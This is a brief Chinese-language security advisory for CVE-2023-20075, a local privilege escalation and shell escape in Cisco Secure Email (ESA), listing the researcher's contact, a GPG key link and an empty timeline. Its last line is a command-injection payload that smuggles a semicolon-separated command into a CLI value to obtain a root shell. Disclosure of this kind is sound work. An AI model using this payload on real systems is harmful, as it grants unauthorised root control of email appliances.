安全研究员: ly1g3, ly1g3[at]tuta.io
GPG 指纹: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
概述: 本地权限提升与 Shell 逃逸
CVE: CVE-2023-20075
时间线:
ESA (Cisco Secure Email)
拥有 cli 访问权限的已认证用户可以提升权限至 root 并执行任意代码
logcollector36;/bin/sh/data/release/phoebe-14*/bin/runas 0 /bin/sh